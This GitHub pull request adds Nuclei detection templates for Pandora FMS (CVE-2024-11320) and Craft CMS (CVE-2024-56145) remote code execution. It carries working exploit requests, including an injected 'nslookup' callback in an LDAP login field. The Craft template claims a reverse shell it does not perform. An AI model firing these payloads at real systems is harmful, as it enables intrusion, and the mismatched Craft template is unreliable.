Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

pandora-remote-code-execution CVE-2024-11320 #11281

Open
wants to merge 6 commits into
base: main
Choose a base branch
from
Open

pandora-remote-code-execution CVE-2024-11320 #11281

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
7ebb7ee
Add files via upload
shubhamrooter Dec 2, 2024
4bf2401
Merge branch 'main' into main
shubhamrooter Dec 2, 2024
6e4e31f
fixing-template
DhiyaneshGeek Dec 4, 2024
e0fb338
Merge branch 'main' into main
shubhamrooter Dec 13, 2024
b09233f
Merge branch 'projectdiscovery:main' into main
shubhamrooter Dec 20, 2024
3429f97
Add files via upload
shubhamrooter Dec 20, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
100 changes: 100 additions & 0 deletions http/cves/2024/CVE-2024-11320.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,100 @@
id: CVE-2024-11320

info:
name: Pandora v7.0NG.777.3 - Remote Code Execution
author: DhiyaneshDK,Shubham Rooter
severity: critical
description: |
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS- from 700 through <=777.4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11320
cwe-id: CWE-77
epss-score: 0.00043
epss-percentile: 0.10436
cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
metadata:
vendor: pandorafms
product: pandora_fms
shodan-query:
- http.html:"pandora fms - installation wizard"
- http.title:"pandora fms"
fofa-query:
- body="pandora fms - installation wizard"
- title="pandora fms"
google-query: intitle:"pandora fms"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
- raw:
- |
GET /index.php?login=1 HTTP/1.1
Host: {{Hostname}}

extractors:
- type: regex
name: csrf_code
group: 1
regex:
- 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
internal: true

- raw:
- |
POST /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}

matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'PHPSESSID=')
condition: and
internal: true

- raw:
- |
GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'Server health')
condition: and
internal: true

- raw:
- |
GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, 'Authentication method</td>', 'LDAP')
condition: and
internal: true

- raw:
- |
POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup&section=auth
Content-Type: application/x-www-form-urlencoded

update_config=1&csrf_code={{csrf_code}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3Bnslookup+{{interactsh-url}}+%23&ldap_admin_pass=test&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local

matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body,'Correctly updated the setup options')
condition: and
57 changes: 57 additions & 0 deletions http/cves/2024/cve-2024-56145.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
id: cve-2024-56145

info:
name: Craft CMS Remote Code Execution (RCE)
author: Shubham Rooter
severity: critical
description: |
Craft CMS suffers from a Remote Code Execution (RCE) vulnerability due to improper handling of the `--configPath` parameter.
This template checks if the target is vulnerable and exploits it by triggering a reverse shell.
reference:
- https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
tags: cve,cve2024,rce,craftcms

requests:
- method: GET
path:
- "{{BaseURL}}?--configPath=/{{randstr}}"

matchers-condition: and
matchers:
- type: status
status:
- 503

- type: word
words:
- "mkdir()"
part: body

extractors:
- type: regex
part: body
regex:
- "mkdir\\(\\)"

- method: GET
path:
- "{{BaseURL}}?--templatesPath=ftp://{{interactsh-url}}"

payloads:
default:
- "{{interactsh-payload}}"

attack: pitchfork
threads: 10

matchers:
- type: regex
regex:
- "{{interactsh-placeholder}}"
part: interactsh_protocol

extractors:
- type: regex
part: interactsh_protocol
regex:
- "{{interactsh-placeholder}}"